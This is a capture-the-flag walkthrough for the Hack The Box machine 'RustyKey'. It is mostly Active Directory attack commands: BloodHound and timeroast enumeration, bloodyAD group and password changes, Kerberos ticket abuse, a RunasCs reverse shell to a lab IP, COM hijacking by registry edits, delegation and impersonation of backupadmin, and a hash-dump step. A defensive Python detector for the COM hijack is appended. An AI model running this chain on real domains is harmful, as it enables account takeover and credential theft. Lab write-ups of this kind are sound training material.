HTB - RustyKey

Nmap Scan

Kerberos Configuration

sudo nano /etc/krb5.conf

BloodHound & Timeroast

bloodhound-python -u $user -p $pass -c All -o bloodhound_$user.json -d rustykey.htb -ns 10.10.11.75 --zip -k
nxc smb IP -M timeroast
    
Exploitation chain

bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k add groupMember HELPDESK 'IT-COMPUTER3$'
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k set password BB.MORGAN 'P@ssword123'
bloodyAD --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'PROTECTED OBJECTS' 'IT'

impacket-getTGT 'RUSTYKEY.HTB/BB.MORGAN:P@ssword123'
export KRB5CCNAME=BB.MORGAN.ccache
evil-winrm -i dc.rustykey.htb -r RUSTYKEY.HTB

bloodyAD --kerberos --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' set password bb.morgan 'pa$$w0rd'
bloodyAD --kerberos --host dc.rustykey.htb -d rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' set password ee.reed 'Password123!'

.\RunasCs.exe ee.reed Password123! cmd.exe -r 10.10.14.31:9001
reg add "HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\Tools\rev.dll" /f
PowerShell
Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$
    
Impersonation & Dump

impacket-getST -spn 'cifs/DC.rustykey.htb' -impersonate backupadmin -dc-ip 10.129.65.227 -k 'RUSTYKEY.HTB/IT-COMPUTER3$:Rusty88!'
reg add "HKLM\Software\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" /ve /d "C:\Tools\shell.dll" /f
    
Dump the NTLM hashes, SYSTEM, and SAM with secretsdump or mimikatz.
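
Added example, not part of the original write-up: detection logic for the InprocServer32 overwrite used in the chain above, run over constructed registry value-set events. The event field names (TargetObject, Details), the "(Default)" suffix and the trusted-directory list are assumptions.

```python
import re
from ntpath import normpath

# Registry path of a COM in-process server registration (default value).
INPROC_RE = re.compile(
    r"^(HKLM\\SOFTWARE\\Classes|HKCR)\\CLSID\\(\{[0-9A-F-]{36}\})\\InprocServer32(\\\(Default\))?$",
    re.IGNORECASE,
)

# Assumption: directories where COM server DLLs are normally installed.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def is_trusted_path(dll_path):
    """True if the DLL path, after resolving '..' segments, sits under a trusted root."""
    resolved = normpath(dll_path.strip().strip('"')).lower()
    return resolved.startswith(TRUSTED_ROOTS)


def suspicious_inproc_changes(events):
    """Return (clsid, dll) pairs for InprocServer32 writes pointing outside trusted roots."""
    hits = []
    for ev in events:
        m = INPROC_RE.match(ev["TargetObject"])
        if m and not is_trusted_path(ev["Details"]):
            hits.append((m.group(2).upper(), ev["Details"]))
    return hits


# Constructed sample events (field names assumed, values built for this example).
SAMPLE_EVENTS = [
    {"TargetObject": r"HKLM\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\(Default)",
     "Details": r"C:\Tools\rev.dll"},
    {"TargetObject": r"HKLM\SOFTWARE\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32\(Default)",
     "Details": r"C:\Program Files\Example\shellext.dll"},
    {"TargetObject": r"HKLM\SOFTWARE\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32\(Default)",
     "Details": r"C:\Windows\..\Tools\shell.dll"},
    {"TargetObject": r"HKLM\SOFTWARE\Example\Settings\Path", "Details": r"C:\Tools\rev.dll"},
]

if __name__ == "__main__":
    for clsid, dll in suspicious_inproc_changes(SAMPLE_EVENTS):
        print(f"ALERT {clsid} -> {dll}")
```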

Acknowledgements

Thanks, Artemis Community 🛡️